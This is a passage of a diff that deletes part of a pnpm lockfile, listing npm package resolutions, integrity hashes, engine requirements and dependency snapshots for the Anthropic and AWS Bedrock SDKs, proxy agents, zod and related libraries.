-    deprecated: Old versions of glob are not supported, and contain widely publicized security vulnerabilities, which have been fixed in the current version. Please update. Support for old versions may be purchased (at exorbitant rates) by contacting i@izs.me
-    hasBin: true
-
-  google-auth-library@10.6.1:
-    resolution: {integrity: sha512-5awwuLrzNol+pFDmKJd0dKtZ0fPLAtoA5p7YO4ODsDu6ONJUVqbYwvv8y2ZBO5MBNp9TJXigB19710kYpBPdtA==}
-    engines: {node: '>=18'}
-
-  google-logging-utils@1.1.3:
-    resolution: {integrity: sha512-eAmLkjDjAFCVXg7A1unxHsLf961m6y17QFqXqAXGj/gVkKFrEICfStRfwUlGNfeCEjNRa32JEWOUTlYXPyyKvA==}
-    engines: {node: '>=14'}
-
-  http-proxy-agent@7.0.2:
-    resolution: {integrity: sha512-T1gkAiYYDWYx3V5Bmyu7HcfcvL7mUrTWiM6yOfa3PIphViJ/gFPbvidQ+veqSOHci/PxBcDabeUNCzpOODJZig==}
-    engines: {node: '>= 14'}
-
-  https-proxy-agent@7.0.6:
-    resolution: {integrity: sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw==}
-    engines: {node: '>= 14'}
-
-  ip-address@10.1.0:
-    resolution: {integrity: sha512-XXADHxXmvT9+CRxhXg56LJovE+bmWnEWB78LB83VZTprKTmaC5QfruXocxzTZ2Kl0DNwKuBdlIhjL8LeY8Sf8Q==}
-    engines: {node: '>= 12'}
-
-  is-fullwidth-code-point@3.0.0:
-    resolution: {integrity: sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==}
-    engines: {node: '>=8'}
-
-  isexe@2.0.0:
-    resolution: {integrity: sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==}
-
-  jackspeak@3.4.3:
-    resolution: {integrity: sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==}
-
-  json-bigint@1.0.0:
-    resolution: {integrity: sha512-SiPv/8VpZuWbvLSMtTDU8hEfrZWg/mH/nV/b4o0CYbSxu1UIQPLdwKOCIyLQX+VIPO5vrLX3i8qtqFyhdPSUSQ==}
-
-  json-schema-to-ts@3.1.1:
-    resolution: {integrity: sha512-+DWg8jCJG2TEnpy7kOm/7/AxaYoaRbjVB4LFZLySZlWn8exGs3A4OLJR966cVvU26N7X9TWxl+Jsw7dzAqKT6g==}
-    engines: {node: '>=16'}
-
-  json-schema-traverse@1.0.0:
-    resolution: {integrity: sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==}
-
-  jwa@2.0.1:
-    resolution: {integrity: sha512-hRF04fqJIP8Abbkq5NKGN0Bbr3JxlQ+qhZufXVr0DvujKy93ZCbXZMHDL4EOtodSbCWxOqR8MS1tXA5hwqCXDg==}
-
-  jws@4.0.1:
-    resolution: {integrity: sha512-EKI/M/yqPncGUUh44xz0PxSidXFr/+r0pA70+gIYhjv+et7yxM+s29Y+VGDkovRofQem0fs7Uvf4+YmAdyRduA==}
-
-  long@5.3.2:
-    resolution: {integrity: sha512-mNAgZ1GmyNhD7AuqnTG3/VQ26o760+ZYBPKjPvugO8+nLbYfX6TVpJPseBvopbdY+qpZ/lKUnmEc1LeZYS3QAA==}
-
-  lru-cache@10.4.3:
-    resolution: {integrity: sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ==}
-
-  lru-cache@7.18.3:
-    resolution: {integrity: sha512-jumlc0BIUrS3qJGgIkWZsyfAM7NCWiBcCDhnd+3NNM5KbBmLTgHVfWBcg6W+rLUsIpzpERPsvwUP7CckAQSOoA==}
-    engines: {node: '>=12'}
-
-  minimatch@9.0.9:
-    resolution: {integrity: sha512-OBwBN9AL4dqmETlpS2zasx+vTeWclWzkblfZk7KTA5j3jeOONz/tRCnZomUyvNg83wL5Zv9Ss6HMJXAgL8R2Yg==}
-    engines: {node: '>=16 || 14 >=14.17'}
-
-  minipass@7.1.3:
-    resolution: {integrity: sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==}
-    engines: {node: '>=16 || 14 >=14.17'}
-
-  ms@2.1.3:
-    resolution: {integrity: sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==}
-
-  netmask@2.0.2:
-    resolution: {integrity: sha512-dBpDMdxv9Irdq66304OLfEmQ9tbNRFnFTuZiLo+bD+r332bBmMJ8GBLXklIXXgxd3+v9+KUnZaUR5PJMa75Gsg==}
-    engines: {node: '>= 0.4.0'}
-
-  node-domexception@1.0.0:
-    resolution: {integrity: sha512-/jKZoMpw0F8GRwl4/eLROPA3cfcXtLApP0QzLmUT/HuPCZWyB7IY9ZrMeKw2O/nFIqPQB3PVM9aYm0F312AXDQ==}
-    engines: {node: '>=10.5.0'}
-    deprecated: Use your platform's native DOMException instead
-
-  node-fetch@3.3.2:
-    resolution: {integrity: sha512-dRB78srN/l6gqWulah9SrxeYnxeddIG30+GOqK/9OlLVyLg3HPnr6SqOWTWOXKRwC2eGYCkZ59NNuSgvSrpgOA==}
-    engines: {node: ^12.20.0 || ^14.13.1 || >=16.0.0}
-
-  openai@6.26.0:
-    resolution: {integrity: sha512-zd23dbWTjiJ6sSAX6s0HrCZi41JwTA1bQVs0wLQPZ2/5o2gxOJA5wh7yOAUgwYybfhDXyhwlpeQf7Mlgx8EOCA==}
-    hasBin: true
-    peerDependencies:
-      ws: ^8.18.0
-      zod: ^3.25 || ^4.0
-    peerDependenciesMeta:
-      ws:
-        optional: true
-      zod:
-        optional: true
-
-  p-retry@4.6.2:
-    resolution: {integrity: sha512-312Id396EbJdvRONlngUx0NydfrIQ5lsYu0znKVUzVvArzEIt08V1qhtyESbGVd1FGX7UKtiFp5uwKZdM8wIuQ==}
-    engines: {node: '>=8'}
-
-  pac-proxy-agent@7.2.0:
-    resolution: {integrity: sha512-TEB8ESquiLMc0lV8vcd5Ql/JAKAoyzHFXaStwjkzpOpC5Yv+pIzLfHvjTSdf3vpa2bMiUQrg9i6276yn8666aA==}
-    engines: {node: '>= 14'}
-
-  pac-resolver@7.0.1:
-    resolution: {integrity: sha512-5NPgf87AT2STgwa2ntRMr45jTKrYBGkVU36yT0ig/n/GMAa3oPqhZfIQ2kMEimReg0+t9kZViDVZ83qfVUlckg==}
-    engines: {node: '>= 14'}
-
-  package-json-from-dist@1.0.1:
-    resolution: {integrity: sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw==}
-
-  path-expression-matcher@1.1.3:
-    resolution: {integrity: sha512-qdVgY8KXmVdJZRSS1JdEPOKPdTiEK/pi0RkcT2sw1RhXxohdujUlJFPuS1TSkevZ9vzd3ZlL7ULl1MHGTApKzQ==}
-    engines: {node: '>=14.0.0'}
-
-  path-key@3.1.1:
-    resolution: {integrity: sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==}
-    engines: {node: '>=8'}
-
-  path-scurry@1.11.1:
-    resolution: {integrity: sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==}
-    engines: {node: '>=16 || 14 >=14.18'}
-
-  protobufjs@7.5.4:
-    resolution: {integrity: sha512-CvexbZtbov6jW2eXAvLukXjXUW1TzFaivC46BpWc/3BpcCysb5Vffu+B3XHMm8lVEuy2Mm4XGex8hBSg1yapPg==}
-    engines: {node: '>=12.0.0'}
-
-  proxy-agent@6.5.0:
-    resolution: {integrity: sha512-TmatMXdr2KlRiA2CyDu8GqR8EjahTG3aY3nXjdzFyoZbmB8hrBsTyMezhULIXKnC0jpfjlmiZ3+EaCzoInSu/A==}
-    engines: {node: '>= 14'}
-
-  proxy-from-env@1.1.0:
-    resolution: {integrity: sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==}
-
-  require-from-string@2.0.2:
-    resolution: {integrity: sha512-Xf0nWe6RseziFMu+Ap9biiUbmplq6S9/p+7w7YXP/JBHhrUDDUhwa+vANyubuqfZWTveU//DYVGsDG7RKL/vEw==}
-    engines: {node: '>=0.10.0'}
-
-  retry@0.13.1:
-    resolution: {integrity: sha512-XQBQ3I8W1Cge0Seh+6gjj03LbmRFWuoszgK9ooCpwYIrhhoO80pfq4cUkU5DkknwfOfFteRwlZ56PYOGYyFWdg==}
-    engines: {node: '>= 4'}
-
-  rimraf@5.0.10:
-    resolution: {integrity: sha512-l0OE8wL34P4nJH/H2ffoaniAokM2qSmrtXHmlpvYr5AVVX8msAyW0l8NVJFDxlSK4u3Uh/f41cQheDVdnYijwQ==}
-    hasBin: true
-
-  safe-buffer@5.2.1:
-    resolution: {integrity: sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==}
-
-  shebang-command@2.0.0:
-    resolution: {integrity: sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==}
-    engines: {node: '>=8'}
-
-  shebang-regex@3.0.0:
-    resolution: {integrity: sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==}
-    engines: {node: '>=8'}
-
-  signal-exit@4.1.0:
-    resolution: {integrity: sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==}
-    engines: {node: '>=14'}
-
-  smart-buffer@4.2.0:
-    resolution: {integrity: sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==}
-    engines: {node: '>= 6.0.0', npm: '>= 3.0.0'}
-
-  socks-proxy-agent@8.0.5:
-    resolution: {integrity: sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw==}
-    engines: {node: '>= 14'}
-
-  socks@2.8.7:
-    resolution: {integrity: sha512-HLpt+uLy/pxB+bum/9DzAgiKS8CX1EvbWxI4zlmgGCExImLdiad2iCwXT5Z4c9c3Eq8rP2318mPW2c+QbtjK8A==}
-    engines: {node: '>= 10.0.0', npm: '>= 3.0.0'}
-
-  source-map@0.6.1:
-    resolution: {integrity: sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==}
-    engines: {node: '>=0.10.0'}
-
-  string-width@4.2.3:
-    resolution: {integrity: sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==}
-    engines: {node: '>=8'}
-
-  string-width@5.1.2:
-    resolution: {integrity: sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==}
-    engines: {node: '>=12'}
-
-  strip-ansi@6.0.1:
-    resolution: {integrity: sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==}
-    engines: {node: '>=8'}
-
-  strip-ansi@7.2.0:
-    resolution: {integrity: sha512-yDPMNjp4WyfYBkHnjIRLfca1i6KMyGCtsVgoKe/z1+6vukgaENdgGBZt+ZmKPc4gavvEZ5OgHfHdrazhgNyG7w==}
-    engines: {node: '>=12'}
-
-  strnum@2.2.0:
-    resolution: {integrity: sha512-Y7Bj8XyJxnPAORMZj/xltsfo55uOiyHcU2tnAVzHUnSJR/KsEX+9RoDeXEnsXtl/CX4fAcrt64gZ13aGaWPeBg==}
-
-  ts-algebra@2.0.0:
-    resolution: {integrity: sha512-FPAhNPFMrkwz76P7cdjdmiShwMynZYN6SgOujD1urY4oNm80Ou9oMdmbR45LotcKOXoy7wSmHkRFE6Mxbrhefw==}
-
-  tslib@2.8.1:
-    resolution: {integrity: sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w==}
-
-  undici-types@7.18.2:
-    resolution: {integrity: sha512-AsuCzffGHJybSaRrmr5eHr81mwJU3kjw6M+uprWvCXiNeN9SOGwQ3Jn8jb8m3Z6izVgknn1R0FTCEAP2QrLY/w==}
-
-  undici@7.24.4:
-    resolution: {integrity: sha512-BM/JzwwaRXxrLdElV2Uo6cTLEjhSb3WXboncJamZ15NgUURmvlXvxa6xkwIOILIjPNo9i8ku136ZvWV0Uly8+w==}
-    engines: {node: '>=20.18.1'}
-
-  web-streams-polyfill@3.3.3:
-    resolution: {integrity: sha512-d2JWLCivmZYTSIoge9MsgFCZrt571BikcWGYkjC1khllbTeDlGqZ2D8vD8E/lJa8WGWbb7Plm8/XJYV7IJHZZw==}
-    engines: {node: '>= 8'}
-
-  which@2.0.2:
-    resolution: {integrity: sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==}
-    engines: {node: '>= 8'}
-    hasBin: true
-
-  wrap-ansi@7.0.0:
-    resolution: {integrity: sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==}
-    engines: {node: '>=10'}
-
-  wrap-ansi@8.1.0:
-    resolution: {integrity: sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==}
-    engines: {node: '>=12'}
-
-  ws@8.19.0:
-    resolution: {integrity: sha512-blAT2mjOEIi0ZzruJfIhb3nps74PRWTCz1IjglWEEpQl5XS/UNama6u2/rjFkDDouqr4L67ry+1aGIALViWjDg==}
-    engines: {node: '>=10.0.0'}
-    peerDependencies:
-      bufferutil: ^4.0.1
-      utf-8-validate: '>=5.0.2'
-    peerDependenciesMeta:
-      bufferutil:
-        optional: true
-      utf-8-validate:
-        optional: true
-
-  zod-to-json-schema@3.25.1:
-    resolution: {integrity: sha512-pM/SU9d3YAggzi6MtR4h7ruuQlqKtad8e9S0fmxcMi+ueAK5Korys/aWcV9LIIHTVbj01NdzxcnXSN+O74ZIVA==}
-    peerDependencies:
-      zod: ^3.25 || ^4
-
-  zod@4.3.6:
-    resolution: {integrity: sha512-rftlrkhHZOcjDwkGlnUtZZkvaPHCsDATp4pGpuOOMDaTdDDXF91wuVDJoWoPsKX/3YPQ5fHuF3STjcYyKr+Qhg==}
-
-snapshots:
-
-  '@anthropic-ai/sdk@0.73.0(zod@4.3.6)':
-    dependencies:
-      json-schema-to-ts: 3.1.1
-    optionalDependencies:
-      zod: 4.3.6
-
-  '@aws-crypto/crc32@5.2.0':
-    dependencies:
-      '@aws-crypto/util': 5.2.0
-      '@aws-sdk/types': 3.973.6
-      tslib: 2.8.1
-
-  '@aws-crypto/sha256-browser@5.2.0':
-    dependencies:
-      '@aws-crypto/sha256-js': 5.2.0
-      '@aws-crypto/supports-web-crypto': 5.2.0
-      '@aws-crypto/util': 5.2.0
-      '@aws-sdk/types': 3.973.6
-      '@aws-sdk/util-locate-window': 3.965.5
-      '@smithy/util-utf8': 2.3.0
-      tslib: 2.8.1
-
-  '@aws-crypto/sha256-js@5.2.0':
-    dependencies:
-      '@aws-crypto/util': 5.2.0
-      '@aws-sdk/types': 3.973.6
-      tslib: 2.8.1
-
-  '@aws-crypto/supports-web-crypto@5.2.0':
-    dependencies:
-      tslib: 2.8.1
-
-  '@aws-crypto/util@5.2.0':
-    dependencies:
-      '@aws-sdk/types': 3.973.6
-      '@smithy/util-utf8': 2.3.0
-      tslib: 2.8.1
-
-  '@aws-sdk/client-bedrock-runtime@3.1009.0':
-    dependencies:
-      '@aws-crypto/sha256-browser': 5.2.0
-      '@aws-crypto/sha256-js': 5.2.0
-      '@aws-sdk/core': 3.973.20
-      '@aws-sdk/credential-provider-node': 3.972.21
-      '@aws-sdk/eventstream-handler-node': 3.972.11
-      '@aws-sdk/middleware-eventstream': 3.972.8
-      '@aws-sdk/middleware-host-header': 3.972.8
-      '@aws-sdk/middleware-logger': 3.972.8
-      '@aws-sdk/middleware-recursion-detection': 3.972.8
-      '@aws-sdk/middleware-user-agent': 3.972.21
-      '@aws-sdk/middleware-websocket': 3.972.13
-      '@aws-sdk/region-config-resolver': 3.972.8
-      '@aws-sdk/token-providers': 3.1009.0
-      '@aws-sdk/types': 3.973.6
-      '@aws-sdk/util-endpoints': 3.996.5
-      '@aws-sdk/util-user-agent-browser': 3.972.8
-      '@aws-sdk/util-user-agent-node': 3.973.7
-      '@smithy/config-resolver': 4.4.11
-      '@smithy/core': 3.23.12
-      '@smithy/eventstream-serde-browser': 4.2.12
-      '@smithy/eventstream-serde-config-resolver': 4.3.12
-      '@smithy/eventstream-serde-node': 4.2.12
-      '@smithy/fetch-http-handler': 5.3.15
-      '@smithy/hash-node': 4.2.12
-      '@smithy/invalid-dependency': 4.2.12
-      '@smithy/middleware-content-length': 4.2.12
-      '@smithy/middleware-endpoint': 4.4.26
-      '@smithy/middleware-retry': 4.4.43
-      '@smithy/middleware-serde': 4.2.15
-      '@smithy/middleware-stack': 4.2.12
-      '@smithy/node-config-provider': 4.3.12
-      '@smithy/node-http-handler': 4.5.0
-      '@smithy/protocol-http': 5.3.12
-      '@smithy/smithy-client': 4.12.6
-      '@smithy/types': 4.13.1
-      '@smithy/url-parser': 4.2.12
-      '@smithy/util-base64': 4.3.2
-      '@smithy/util-body-length-browser': 4.2.2
-      '@smithy/util-body-length-node': 4.2.3
-      '@smithy/util-defaults-mode-browser': 4.3.42
-      '@smithy/util-defaults-mode-node': 4.2.45
-      '@smithy/util-endpoints': 3.3.3
-      '@smithy/util-middleware': 4.2.12
-      '@smithy/util-retry': 4.2.12
-      '@smithy/util-stream': 4.5.20
-      '@smithy/util-utf8': 4.2.2
-      tslib: 2.8.1
-    transitivePeerDependencies:
-      - aws-crt
-
-  '@aws-sdk/core@3.973.20':
-    dependencies:
-      '@aws-sdk/types': 3.973.6
-      '@aws-sdk/xml-builder': 3.972.11
-      '@smithy/core': 3.23.12
-      '@smithy/node-config-provider': 4.3.12
-      '@smithy/property-provider': 4.2.12
-      '@smithy/protocol-http': 5.3.12
-      '@smithy/signature-v4': 5.3.12
-      '@smithy/smithy-client': 4.12.6
-      '@smithy/types': 4.13.1
-      '@smithy/util-base64': 4.3.2
-      '@smithy/util-middleware': 4.2.12
-      '@smithy/util-utf8': 4.2.2
-      tslib: 2.8.1
-
-  '@aws-sdk/credential-provider-env@3.972.18':
-    dependencies:
-      '@aws-sdk/core': 3.973.20
-      '@aws-sdk/types': 3.973.6
-      '@smithy/property-provider': 4.2.12
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@aws-sdk/credential-provider-http@3.972.20':
-    dependencies:
-      '@aws-sdk/core': 3.973.20
-      '@aws-sdk/types': 3.973.6
-      '@smithy/fetch-http-handler': 5.3.15
-      '@smithy/node-http-handler': 4.5.0
-      '@smithy/property-provider': 4.2.12
-      '@smithy/protocol-http': 5.3.12
-      '@smithy/smithy-client': 4.12.6
-      '@smithy/types': 4.13.1
-      '@smithy/util-stream': 4.5.20
-      tslib: 2.8.1
-
-  '@aws-sdk/credential-provider-ini@3.972.20':
-    dependencies:
-      '@aws-sdk/core': 3.973.20
-      '@aws-sdk/credential-provider-env': 3.972.18
-      '@aws-sdk/credential-provider-http': 3.972.20
-      '@aws-sdk/credential-provider-login': 3.972.20
-      '@aws-sdk/credential-provider-process': 3.972.18
-      '@aws-sdk/credential-provider-sso': 3.972.20
-      '@aws-sdk/credential-provider-web-identity': 3.972.20
-      '@aws-sdk/nested-clients': 3.996.10
-      '@aws-sdk/types': 3.973.6
-      '@smithy/credential-provider-imds': 4.2.12
-      '@smithy/property-provider': 4.2.12
-      '@smithy/shared-ini-file-loader': 4.4.7
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-    transitivePeerDependencies:
-      - aws-crt
-
-  '@aws-sdk/credential-provider-login@3.972.20':
-    dependencies:
-      '@aws-sdk/core': 3.973.20
-      '@aws-sdk/nested-clients': 3.996.10
-      '@aws-sdk/types': 3.973.6
-      '@smithy/property-provider': 4.2.12
-      '@smithy/protocol-http': 5.3.12
-      '@smithy/shared-ini-file-loader': 4.4.7
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-    transitivePeerDependencies:
-      - aws-crt
-
-  '@aws-sdk/credential-provider-node@3.972.21':
-    dependencies:
-      '@aws-sdk/credential-provider-env': 3.972.18
-      '@aws-sdk/credential-provider-http': 3.972.20
-      '@aws-sdk/credential-provider-ini': 3.972.20
-      '@aws-sdk/credential-provider-process': 3.972.18
-      '@aws-sdk/credential-provider-sso': 3.972.20
-      '@aws-sdk/credential-provider-web-identity': 3.972.20
-      '@aws-sdk/types': 3.973.6
-      '@smithy/credential-provider-imds': 4.2.12
-      '@smithy/property-provider': 4.2.12
-      '@smithy/shared-ini-file-loader': 4.4.7
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-    transitivePeerDependencies:
-      - aws-crt
-
-  '@aws-sdk/credential-provider-process@3.972.18':
-    dependencies:
-      '@aws-sdk/core': 3.973.20
-      '@aws-sdk/types': 3.973.6
-      '@smithy/property-provider': 4.2.12
-      '@smithy/shared-ini-file-loader': 4.4.7
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@aws-sdk/credential-provider-sso@3.972.20':
-    dependencies:
-      '@aws-sdk/core': 3.973.20
-      '@aws-sdk/nested-clients': 3.996.10
-      '@aws-sdk/token-providers': 3.1009.0
-      '@aws-sdk/types': 3.973.6
-      '@smithy/property-provider': 4.2.12
-      '@smithy/shared-ini-file-loader': 4.4.7
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-    transitivePeerDependencies:
-      - aws-crt
-
-  '@aws-sdk/credential-provider-web-identity@3.972.20':
-    dependencies:
-      '@aws-sdk/core': 3.973.20
-      '@aws-sdk/nested-clients': 3.996.10
-      '@aws-sdk/types': 3.973.6
-      '@smithy/property-provider': 4.2.12
-      '@smithy/shared-ini-file-loader': 4.4.7
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-    transitivePeerDependencies:
-      - aws-crt
-
-  '@aws-sdk/eventstream-handler-node@3.972.11':
-    dependencies:
-      '@aws-sdk/types': 3.973.6
-      '@smithy/eventstream-codec': 4.2.12
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@aws-sdk/middleware-eventstream@3.972.8':
-    dependencies:
-      '@aws-sdk/types': 3.973.6
-      '@smithy/protocol-http': 5.3.12
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@aws-sdk/middleware-host-header@3.972.8':
-    dependencies:
-      '@aws-sdk/types': 3.973.6
-      '@smithy/protocol-http': 5.3.12
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@aws-sdk/middleware-logger@3.972.8':
-    dependencies:
-      '@aws-sdk/types': 3.973.6
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@aws-sdk/middleware-recursion-detection@3.972.8':
-    dependencies:
-      '@aws-sdk/types': 3.973.6
-      '@aws/lambda-invoke-store': 0.2.4
-      '@smithy/protocol-http': 5.3.12
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@aws-sdk/middleware-user-agent@3.972.21':
-    dependencies:
-      '@aws-sdk/core': 3.973.20
-      '@aws-sdk/types': 3.973.6
-      '@aws-sdk/util-endpoints': 3.996.5
-      '@smithy/core': 3.23.12
-      '@smithy/protocol-http': 5.3.12
-      '@smithy/types': 4.13.1
-      '@smithy/util-retry': 4.2.12
-      tslib: 2.8.1
-
-  '@aws-sdk/middleware-websocket@3.972.13':
-    dependencies:
-      '@aws-sdk/types': 3.973.6
-      '@aws-sdk/util-format-url': 3.972.8
-      '@smithy/eventstream-codec': 4.2.12
-      '@smithy/eventstream-serde-browser': 4.2.12
-      '@smithy/fetch-http-handler': 5.3.15
-      '@smithy/protocol-http': 5.3.12
-      '@smithy/signature-v4': 5.3.12
-      '@smithy/types': 4.13.1
-      '@smithy/util-base64': 4.3.2
-      '@smithy/util-hex-encoding': 4.2.2
-      '@smithy/util-utf8': 4.2.2
-      tslib: 2.8.1
-
-  '@aws-sdk/nested-clients@3.996.10':
-    dependencies:
-      '@aws-crypto/sha256-browser': 5.2.0
-      '@aws-crypto/sha256-js': 5.2.0
-      '@aws-sdk/core': 3.973.20
-      '@aws-sdk/middleware-host-header': 3.972.8
-      '@aws-sdk/middleware-logger': 3.972.8
-      '@aws-sdk/middleware-recursion-detection': 3.972.8
-      '@aws-sdk/middleware-user-agent': 3.972.21
-      '@aws-sdk/region-config-resolver': 3.972.8
-      '@aws-sdk/types': 3.973.6
-      '@aws-sdk/util-endpoints': 3.996.5
-      '@aws-sdk/util-user-agent-browser': 3.972.8
-      '@aws-sdk/util-user-agent-node': 3.973.7
-      '@smithy/config-resolver': 4.4.11
-      '@smithy/core': 3.23.12
-      '@smithy/fetch-http-handler': 5.3.15
-      '@smithy/hash-node': 4.2.12
-      '@smithy/invalid-dependency': 4.2.12
-      '@smithy/middleware-content-length': 4.2.12
-      '@smithy/middleware-endpoint': 4.4.26
-      '@smithy/middleware-retry': 4.4.43
-      '@smithy/middleware-serde': 4.2.15
-      '@smithy/middleware-stack': 4.2.12
-      '@smithy/node-config-provider': 4.3.12
-      '@smithy/node-http-handler': 4.5.0
-      '@smithy/protocol-http': 5.3.12
-      '@smithy/smithy-client': 4.12.6
-      '@smithy/types': 4.13.1
-      '@smithy/url-parser': 4.2.12
-      '@smithy/util-base64': 4.3.2
-      '@smithy/util-body-length-browser': 4.2.2
-      '@smithy/util-body-length-node': 4.2.3
-      '@smithy/util-defaults-mode-browser': 4.3.42
-      '@smithy/util-defaults-mode-node': 4.2.45
-      '@smithy/util-endpoints': 3.3.3
-      '@smithy/util-middleware': 4.2.12
-      '@smithy/util-retry': 4.2.12
-      '@smithy/util-utf8': 4.2.2
-      tslib: 2.8.1
-    transitivePeerDependencies:
-      - aws-crt
-
-  '@aws-sdk/region-config-resolver@3.972.8':
-    dependencies:
-      '@aws-sdk/types': 3.973.6
-      '@smithy/config-resolver': 4.4.11
-      '@smithy/node-config-provider': 4.3.12
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@aws-sdk/token-providers@3.1009.0':
-    dependencies:
-      '@aws-sdk/core': 3.973.20
-      '@aws-sdk/nested-clients': 3.996.10
-      '@aws-sdk/types': 3.973.6
-      '@smithy/property-provider': 4.2.12
-      '@smithy/shared-ini-file-loader': 4.4.7
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-    transitivePeerDependencies:
-      - aws-crt
-
-  '@aws-sdk/types@3.973.6':
-    dependencies:
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@aws-sdk/util-endpoints@3.996.5':
-    dependencies:
-      '@aws-sdk/types': 3.973.6
-      '@smithy/types': 4.13.1
-      '@smithy/url-parser': 4.2.12
-      '@smithy/util-endpoints': 3.3.3
-      tslib: 2.8.1
-
-  '@aws-sdk/util-format-url@3.972.8':
-    dependencies:
-      '@aws-sdk/types': 3.973.6
-      '@smithy/querystring-builder': 4.2.12
-      '@smithy/types': 4.13.1
-      tslib: 2.8.1
-
-  '@aws-sdk/util-locate-window@3.965.5':
-    dependencies:
-      tslib: 2.8.1
-
-  '@aws-sdk/util-user-agent-browser@3.972.8':
-    dependencies:
-      '@aws-sdk/types': 3.973.6
-      '@smithy/types': 4.13.1
-      bowser: 2.14.1
-      tslib: 2.8.1
-
-  '@aws-sdk/util-user-agent-node@3.973.7':
-    dependencies:
-      '@aws-sdk/middleware-user-agent': 3.972.21
-      '@aws-sdk/types': 3.973.6
-      '@smithy/node-config-provider': 4.3.12
-      '@smithy/types': 4.13.1
-      '@smithy/util-config-provider': 4.2.2
-      tslib: 2.8.1
-
-  '@aws-sdk/xml-builder@3.972.11':
-    dependencies:
-      '@smithy/types': 4.13.1
-      fast-xml-parser: 5.4.1
-      tslib: 2.8.1
-
-  '@aws/lambda-invoke-store@0.2.4': {}
-
